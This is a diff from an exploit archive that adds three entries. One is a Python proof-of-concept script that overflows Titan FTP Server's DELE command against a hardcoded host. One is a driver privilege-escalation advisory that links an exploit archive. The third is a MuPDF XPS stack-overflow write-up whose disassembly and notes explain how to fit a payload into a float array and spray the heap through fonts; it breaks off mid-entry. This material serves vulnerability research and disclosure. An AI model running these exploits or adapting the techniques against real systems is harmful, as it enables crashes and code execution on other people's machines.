@@ -0,0 +1,42 @@ +source: http://www.securityfocus.com/bid/27611/info + +Titan FTP Server is prone to a remote buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer. + +An attacker may exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successfully exploiting this issue will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial of service. + +This issue affects Titan FTP Server 6.05 build 550; other versions may also be vulnerable. + +#!/usr/bin/python +# +# First of all, thanks to my wife Edita. +# +# Heap overflow in Titan FTP Server version 6.05 build 550 +# (DELE ) - probably other commands are vulnerable too +# PoC tested on WinXP sp1 +# EAX and ESI are overwritten with 41414141 and 44444444 +# +# Greetz to muts, m1k1, bolexxx +# and crew from offsec, remote-exploit.org, Cedes.ba, Itas and Cikom :) +# +# Coded by Muris Kurgas a.k.a j0rgan < muris [at] cg [dot] yu > + + +import socket +s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) + +print "\nSaljem zli bafer..." +buffer = '\x90' * 20519 + "A" * 4 + "D" * 4 + "B" * 55000 +s.connect(('192.168.1.9',21)) +data = s.recv(1024) +s.send('USER ftp' +'\r\n') +data = s.recv(1024) +s.send('PASS ftp' +'\r\n') +data = s.recv(1024) +print "\nBum! Bum! Bum! :)" +s.send('DELE ' +buffer+'\r\n') +s.close() + + +be safe, +j0rgan + diff --git a/platforms/windows/local/30999.txt b/platforms/windows/local/30999.txt new file mode 100755 index 000000000..0ae48cc49 --- /dev/null +++ b/platforms/windows/local/30999.txt 
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/27179/info
+
+Creative Ensoniq PCI ES1371 WDM drivers are prone to a local privilege-escalation vulnerability.
+
+Successful exploits allow local users to execute arbitrary machine code with kernel-level privileges, facilitating the complete compromise of affected computers.
+
+This issue occurs when the vulnerable driver is running in a Microsoft Windows Vista environment. This occurs in VMware Server and Workstation environments when running Microsoft Vista guest operating systems with sound enabled.
+
+This issue affects 'es1371mp.sys' 5.1.3612.0. Given the nature of the issue, other device drivers and versions may also be vulnerable, but this has not been confirmed.
+
+http://www.exploit-db.com/sploits/30999.zip
\ No newline at end of file
diff --git a/platforms/windows/local/31090.txt b/platforms/windows/local/31090.txt
new file mode 100755
index 000000000..ea3ab55ca
--- /dev/null
+++ b/platforms/windows/local/31090.txt
@@ -0,0 +1,349 @@
+=============================================================
+0day - MuPDF Stack-based Buffer Overflow in xps_parse_color()
+=============================================================
+# Date of discovery: 2013-01-26
+# Software Links: http://www.mupdf.com/ ; http://en.wikipedia.org/wiki/MuPDF
+# Version: <= 1.3
+# Author: Jean-Jamil Khalife
+# Tested on: Windows XP SP3 (fr) / Windows 7 x64 (fr)
+# Home: http://www.hdwsec.fr
+# Blog : http://www.hdwsec.fr/blog.html
+
+Proof of Concept: http://www.exploit-db.com/sploits/31090.xps
+
+Description :
+==============
+This vulnerability leads to a remote code execution when a user opens a
+malicious XPS document.
+
+
+Disclosure Timeline :
+=====================
+2014-01-16 MuPDF contacted
+2014-01-18 fix integrated
+
+
+Analysis :
+==========
+When MuPDF loads the XPS document, it loads the first page and parses
+each element via xps_parse_element() as detailed in the XPS
+specification (
+http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-388.pdf ),
+When the crash occurs, the call stack looks like this :
+
+
+mupdf.exe!xps_parse_path
+mupdf.exe!xps_parse_element
+mupdf.exe!xps_parse_fixed_page
+mupdf.exe!xps_run_page
+mupdf.exe!fz_run_page_contents
+mupdf.exe!pdfapp_loadpage
+
+
+
+void
+xps_parse_element(xps_document *doc, const fz_matrix *ctm, const fz_rect
+*area, char *base_uri, xps_resource *dict, fz_xml *node )
+{
+.............
+if (!strcmp(fz_xml_tag(node), "Path"))
+xps_parse_path(doc, ctm, base_uri, dict, node);
+if (!strcmp(fz_xml_tag(node), "Glyphs"))
+xps_parse_glyphs(doc, ctm, base_uri, dict, node);
+.............
+}
+
+
+In this case, the Path element is parsed via the xps_parse_path()
+function which allows extraction of the attributes and extended
+attributes (Clip, Data, Fill, ...).
+If some conditions are fulfilled, we can trigger a stack overflow in the
+xps_parse_color() function when it parses the value "ContextColor" of
+the attribute "Fill".
+ + +void +xps_parse_path(xps_document *doc, const fz_matrix *ctm, char *base_uri, +xps_resource *dict, fz_xml *root) +{ +fz_stroke_state *stroke = NULL; +fz_matrix transform; +float samples[32]; +fz_colorspace *colorspace; +fz_path *path; +fz_path *stroke_path = NULL; +fz_rect area; +int fill_rule; +int dash_len = 0; +fz_matrix local_ctm; +....... +fill_att = fz_xml_att(root, "Fill"); +....... +if (fill_att) +{ +xps_parse_color(doc, base_uri, fill_att, &colorspace, samples); +if (fill_opacity_att) +samples[0] *= fz_atof(fill_opacity_att); +xps_set_color(doc, colorspace, samples); + +fz_fill_path(doc->dev, path, fill_rule == 0, &local_ctm, +doc->colorspace, doc->color, doc->alpha); +} +....... +} + + +This function is in charge of getting all the floating numbers of +ContextColor and putting them into the samples[32] buffer. The issue is +that it does it without controlling the size of this array. + + +void +xps_parse_color(xps_document *doc, char *base_uri, char *string, +fz_colorspace **csp, float *samples) +{ +............. +else if (strstr(string, "ContextColor ") == string) +{ +fz_strlcpy(buf, string, sizeof buf); +profile = strchr(buf, ' '); +if (!profile) +{ +fz_warn(doc->ctx, "cannot find icc profile uri in '%s'", string); +return; +} +*profile++ = 0; +p = strchr(profile, ' '); +if (!p) +{ +fz_warn(doc->ctx, "cannot find component values in '%s'", profile); +return; +} +*p++ = 0; +n = count_commas(p) + 1; +i = 0; +while (i < n) +{ +samples[i++] = fz_atof(p); +p = strchr(p, ','); +if (!p) +break; +p ++; +if (*p == ' ') +p ++; +} +} +............. 
+} + + +This is the assembly code from the compiled C code above : + +.text:0047C590 loc_47C590: +.text:0047C590 push esi ; char * +.text:0047C591 call fz_atof // convert into float +.text:0047C596 fstp dword ptr [edi+ebx*4] +.text:0047C599 add esp, 4 +.text:0047C59C push 2Ch ; int +.text:0047C59E push esi ; char * +.text:0047C59F add ebx, 1 +.text:0047C5A2 call _strchr // search next comma +.text:0047C5A7 mov esi, eax +.text:0047C5A9 add esp, 8 +.text:0047C5AC test esi, esi // check if the returned pointer is null +.text:0047C5AE jz short loc_47C5C1 +.text:0047C5B0 add esi, 1 +.text:0047C5B3 cmp byte ptr [esi], 20h // trim potential space +.text:0047C5B6 jnz short loc_47C5BB +.text:0047C5B8 add esi, 1 +.text:0047C5BB +.text:0047C5BB loc_47C5BB: +.text:0047C5BB cmp ebx, ebp // check only the number of comma (oops... +no test for the samples size) +.text:0047C5BD jl short loc_47C590 + + +This is an example of a proof-of-concept test case that triggers the +overflow : + + + + + + +Exploitation : +============== +I decided to use the latest version of the executable provided on the +official website. +Software : MuPDF v1.3 +Tested on : Windows XP SP3 (fr) / Windows 7 x64 (fr) + +1) It doesn't matter if the executable is compiled with /GS (this is the +case on mupdf.exe). The reason is that the stack concerns a float array +and an old version of Visual Studio doesn't add security cookies in this +case. +If it was the case the vulnerability would be more difficult to exploit. +We can't erase the SEH because of the small stack buffer but depending +on the concerned software, it maybe possible to replace interesting +variables or structures values to control the EIP. + +2) Given that samples is a float array, we have to make our payload +fit into an array of floats. +The size of the temporary buffer is limited to 0x400 bytes as can be +seen in fz_strlcpy(...). As said above, we have to make our payload fit +into an array of floats. 
For this reason it's important that each float +has a long ansi size (about 22 bytes), otherwise it could be not precise +enough to get the real 4-bytes values. So, 1024 / 22 = 46 * 4 bytes = +184 bytes (not enough to put our shellcode). +Here is an example : + + +.text:00421BCC loc_421BCC: +.text:00421BCC mov edi, [esp+18h] +.text:00421BD0 mov eax, [esi+44h] +.text:00421BD3 call sub_40F730 +.text:00421BD8 mov edi, [esp+1Ch] +.text:00421BDC lea ebx, [edi+1] // ebx = 0x100000 (1mo) +.text:00421BDF test ebx, ebx // check the size +.text:00421BE1 mov [ebp+0], eax +.text:00421BE4 mov [ebp+4], edi +.text:00421BE7 mov esi, [esi+44h] +.text:00421BEA jnz short loc_421BFD +.text:00421BEC xor eax, eax +.text:00421BEE +.text:00421BEE loc_421BEE: ; CODE XREF: .text:00421C06_j + +....... + +.text:00421BFD +.text:00421BFD loc_421BFD: ; CODE XREF: .text:00421BEA_j +.text:00421BFD mov eax, esi +.text:00421BFF call do_scavenging_malloc // go malloc +.text:00421C04 test eax, eax +.text:00421C06 jnz short loc_421BEE +.text:00421C08 push ebx +.text:00421C09 push offset aMallocOfDBytes ; "malloc of %d bytes failed" +.text:00421C0E lea ecx, [eax+1] +.text:00421C11 call sub_40FAD0 + + +No particular check is made except if the size is null or zero. +Obviously, if it's zero, the function returns null. +ebx contains the size of our block (0x100000). + + +.text:0040F450 do_scavenging_malloc proc near +.text:0040F450 push ecx +.text:0040F451 push esi +... + +.text:0040F470 +.text:0040F470 loc_40F470: +.text:0040F470 mov eax, [esi] +.text:0040F472 mov ecx, [eax] +.text:0040F474 mov edx, [eax+4] // & _sub_40F7A0() +.text:0040F477 push ebx // size = 0x100000 +.text:0040F478 push ecx +.text:0040F479 call edx // call _sub_40F7A0() + + +As we can see, __cdecl sub_40F7A0 is dynamically resolved and then +called with the size argument filled in ebx before. 
+
+
+.text:0040F7A0 ; int __cdecl sub_40F7A0(int, size_t)
+.text:0040F7A0
+.text:0040F7A0 mov eax, [esp+arg_4]
+.text:0040F7A4 push eax ; size_t
+.text:0040F7A5 call _malloc // do HeapAlloc() of our font size
+.text:0040F7AA add esp, 4
+.text:0040F7AD retn
+.text:0040F7AD sub_40F7A0 endp
+
+
+Finally, our font allocations are done and will remain without being freed.
+Practically, we need to generate many font files containing our binary
+data into a folder and write the path of each of them into the page file
+using FontUri attribute of Glyphs like shown below to load them.
+
+
+
+
+
+
+...
+